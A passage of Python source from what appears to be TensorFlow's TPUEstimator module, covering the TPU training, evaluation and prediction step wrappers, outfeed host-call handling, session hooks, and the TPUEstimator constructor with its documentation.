grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. Besides, the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
      hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
      A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
      prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
    # TODO(xiejw): Adds validation for prediction dictionary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
    # Makes a deep copy of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
# In export mode, params['use_tpu'] has already been set based on mode
# (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
if not is_export_mode:
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
          err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
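    # The outfeed enqueue is placed on logical core 0, matching the dequeue
    # side in create_tpu_hostcall.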
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
    The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated tensors are passed to the host_fn,
    which is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
    # constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
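      # Evaluate fn inside a CatchInvalidHostcallFunctions context so that ops
      # which are not supported in host calls are rejected.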
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
    # It is assumed evaluation always happens on a single-host TPU system. So,
    # place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
          # TODO(xiejw): Make the specification of the outfeed combination
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
            # If the infeed is in BROADCAST mode (each core receiving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
    # Force all dequeue operations to be run if not consumed by the host calls.
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
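    # examples/sec is global_step/sec scaled by the batch size passed to the
    # constructor.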
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
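    # Use the OS default SIGINT handler during the run so that Ctrl-C
    # force-quits the process instead of hanging.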
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
      'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
  for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
  Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
    export_outputs['classes'] = export_output_lib.ClassificationOutput(
        classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
experimental_export_device_assignment=False,
experimental_embedding_config_spec=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
        EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
        and `prediction_hooks` must not capture any TPU Tensor inside the
        model_fn.
      model_dir: Directory to save model parameters, graph, etc. This can
        also be used to load checkpoints from the directory into an estimator
        to continue training a previously saved model. If `None`, the
        model_dir in `config` will be used if set. If both are set, they must
        be the same. If both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently:
  - TPU training and evaluation respect this bit, but eval_on_tpu can
    override execution of eval. See below.
  - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_savedmodel()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
experimental_embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding. IT IS STILL WORK IN PROGRESS, SO PLEASE
DO NOT USE.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as the parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to prevent TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Pass non-None params, as the wrapped model_fn expects a params argument.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, experimental_embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode))
computation, capture = self._build_computation_for_inference(
features, labels, mode, config)
tensors = call_computation(
computation,
self._experimental_export_device_assignment)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
